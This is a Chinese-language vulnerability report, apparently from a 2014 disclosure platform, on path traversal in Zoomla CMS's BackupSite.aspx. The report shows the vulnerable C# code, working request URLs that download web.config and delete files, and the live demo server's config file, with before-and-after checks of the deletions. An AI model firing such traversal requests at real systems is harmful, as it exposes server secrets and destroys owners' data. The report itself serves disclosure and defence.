漏洞详情

披露状态:

2014-08-09: 细节已通知厂商并且等待厂商处理中
2014-08-10: 厂商已经确认,细节仅向厂商公开
2014-08-13: 细节向第三方安全合作伙伴开放
2014-10-04: 细节向核心白帽子及相关领域专家公开
2014-10-14: 细节向普通白帽子公开
2014-10-24: 细节向实习白帽子公开
2014-11-07: 细节向公众公开

简要描述:

逐浪最新版 任意文件删除 任意文件下载

详细说明:

在此请求逐浪cms 重视每个白帽子提交的漏洞 不要老是漏洞忽略
地址

http://demo.zoomla.cn/USER/Develop%5CSiteAdmin/BackupSite.aspx


源码如下

protected void Page_Load(object sender, EventArgs e)
{
this.M_U = this.B_U.GetLogin();
if (base.Request.QueryString["status"] == "del") //任意文件删除
{
this.del(base.Request.QueryString["name"].ToString());
}
if (base.Request.QueryString["status"] == "down") //任意文件下载
{
this.down(base.Request.QueryString["name"].ToString());
}
this.GetBakFileList();
}


我们先看下任意文件下载

public void down(string name)
{
base.Response.Clear();
base.Response.ClearContent();
base.Response.ClearHeaders();
base.Response.AddHeader("Content-Transfer-Encoding", "binary");
base.Response.ContentType = "application/octet-stream";
base.Response.ContentEncoding = Encoding.GetEncoding("gb2312");
string filename = base.Server.MapPath("/Dev/bak/" + this.M_U.UserID.ToString() + "/" + name); //没处理
base.Response.WriteFile(filename);
base.Response.Flush();
base.Response.End();
}


漏洞证明 访问

demo.zoomla.cn/USER/DevelopSiteAdmin/BackupSite.aspx?status=down&name=../../../web.config


83.png


打开文件查看内容

<?xml version="1.0"?>
<!--
注意: 除了手动编辑此文件以外,您还可以使用
Web 管理工具来配置应用程序的设置。可以使用 Visual Studio 中的
“网站”->“Asp.Net 配置”选项。
设置和注释的完整列表在
machine.config.comments 中,该文件通常位于
WindowsMicrosoft.NetFrameworkv2.xConfig 中
-->
<configuration>
<configSections>
<sectionGroup name="system.web">
<!--<section name="neatUpload" type="Brettle.Web.NeatUpload.ConfigSectionHandler, Brettle.Web.NeatUpload" allowLocation="true"/>-->
</sectionGroup>
<section name="RewriterConfig" type="URLRewriter.Config.RewriterConfigSerializerSectionHandler, URLRewriter"/>
</configSections>
<appSettings configSource="ConfigAppSettings.config"/>
<RewriterConfig configSource="ConfigURLRewrite.config"/>
<connectionStrings configSource="ConfigConnectionStrings.config"/>
<system.web>
<sessionState mode="InProc" stateConnectionString="tcpip=127.0.0.1:42424" sqlConnectionString="data source=127.0.0.1;Trusted_Connection=yes" cookieless="false" timeout="20"/>
<!--<identity impersonate="true" userName="administrator" password="password" />-->
<!--Ajax支持-->
<httpHandlers>
<add verb="*" path="*.flv" type="ZoomLa.NoLink"/>
<!--<add verb="*" path="*.aspx" type="URLRewriter.RewriterFactoryHandler,URLRewriter"/>-->
<!--经典模式使用-->
<!--<add verb="*" path="Images/*.jpg" type="UploadHandler"/>-->
</httpHandlers>
<!--end-->
<compilation debug="false" targetFramework="4.0">
<assemblies>
<add assembly="Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A"/>
<add assembly="System.Design, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A"/>
<add assembly="System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A"/>
<add assembly="Accessibility, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A"/>
<add assembly="System.Data.OracleClient, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B77A5C561934E089"/>
<add assembly="System.Messaging, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A"/>
<add assembly="System.Web.Extensions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35"/>
<add assembly="System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A"/>
<add assembly="System.Configuration.Install, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A"/>
<add assembly="System.ServiceProcess, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A"/>
<add assembly="System.DirectoryServices.Protocols, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A"/>
<add assembly="System.DirectoryServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A"/>
</assemblies>
</compilation>
<!--<neatUpload useHttpModule="True" maxNormalRequestLength="1048576" maxRequestLength="2097151" defaultProvider="FilesystemUploadStorageProvider">
<httpRuntime requestValidationMode="2.0" maxRequestLength="512000" appRequestQueueLimit="1000" useFullyQualifiedRedirectUrl="true" executionTimeout="3600"/>
<providers>
<add name="FilesystemUploadStorageProvider" type="Brettle.Web.NeatUpload.FilesystemUploadStorageProvider, Brettle.Web.NeatUpload"/>
</providers>
</neatUpload>-->
<!--通过 <authentication> 节可以配置 ASP.NET 使用的 安全身份验证模式,以标识传入的用户。-->
<!--
如果在执行请求的过程中出现未处理的错误,则通过 <customErrors> 节可以配置相应的处理步骤。
具体说来,开发人员通过该节可以配置要显示的 html 错误页以代替错误堆栈跟踪。RemoteOnly
-->
<customErrors mode="Off" defaultRedirect="~/Prompt/GenericError.htm">
<error statusCode="403" redirect="~/Prompt/NoAccess.htm"/>
<error statusCode="404" redirect="~/Prompt/FileNotFound.htm"/>
<error statusCode="500" redirect="~/Prompt/GenericError.htm"/>
</customErrors>
<!--添加、移除或清除应用程序中的 HTTP 模块。-->
<httpModules>
<!--<add name="UploadHttpModule" type="Brettle.Web.NeatUpload.UploadHttpModule, Brettle.Web.NeatUpload"/>-->
<add name="IPModule" type="ZoomLa.Web.HttpModule.IPHttpModule, ZoomLa.Web"/>
<!--<ADD NAME="MODULEREWRITER" TYPE="URLREWRITER.MODULEREWRITER, URLREWRITER"/>-->
<!--<add name="StrConvHttpModule" type="ZoomLa.HttpModules.StrConvHttpModule, StrConvHttpModule"/>-->
</httpModules>
<!--<httpRuntime maxRequestLength="2097151" executionTimeout="3600" useFullyQualifiedRedirectUrl="true"/>-->
<httpRuntime requestValidationMode="2.0" maxRequestLength="512000" appRequestQueueLimit="1000" useFullyQualifiedRedirectUrl="true" executionTimeout="3600"/>
<pages configSource="ConfigPages.config"/>
</system.web>
<system.webServer>
<validation validateIntegratedModeConfiguration="false"/>
<modules runAllManagedModulesForAllRequests="true">
<!--<add name="StrConvHttpModule" type="ZoomLa.HttpModules.StrConvHttpModule, StrConvHttpModule"/>-->
<add name="IPModule" type="ZoomLa.Web.HttpModule.IPHttpModule, ZoomLa.Web"/>
</modules>
<handlers>
<add name="UrlHandles" path="*.aspx" verb="*" type="URLRewriter.RewriterFactoryHandler,URLRewriter" preCondition="integratedMode"/>
<!--集成模式-->
<add name="Zoomla" path="*.net" verb="*" modules="IsapiModule" scriptProcessor="C:WindowsMicrosoft.NETFrameworkv4.0.30319aspnet_isapi.dll" resourceType="Unspecified" preCondition="classicMode,runtimeVersionv2.0,bitness32"/>
</handlers>
<defaultDocument>
<files>
<remove value="default.aspx"/>
<add value="Default.aspx"/>
</files>
</defaultDocument>
</system.webServer>
</configuration>


可下载其他内容的
接着我们看下任意文件删除

protected void del(string name)
{
FileSystemObject.Delete(base.Server.MapPath("/Dev/bak/" + this.M_U.UserID.ToString() + "/" + name), FsoMethod.File);
}


public static void Delete(string file, FsoMethod method)
{
if ((method == FsoMethod.File) && File.Exists(file))
{
File.Delete(file);
}
if ((method == FsoMethod.Folder) && Directory.Exists(file))
{
Directory.Delete(file, true);
}
}


漏洞证明
我还是本地进行测试好点
先访问

http://demo.zoomla.cn/robots.txt


84.png


文件是存在的
等下我访问

http://demo.zoomla.cn/USER/Develop/SiteAdmin/BackupSite.aspx?status=del&name=../../../robots.txt


在访问

http://demo.zoomla.cn/robots.txt


86.png


不在了
访问

http://demo.zoomla.cn/UploadFiles/3D/200912/200912111913258191.jpg


85.png


是存在的
然后访问

http://demo.zoomla.cn/USER/Develop/SiteAdmin/BackupSite.aspx?status=del&name=../../../UploadFiles/3D/200912/200912111913258191.jpg


88.png


漏洞证明:

漏洞证明如上

修复方案:

对输入的参数进行处理

标签: none

评论已关闭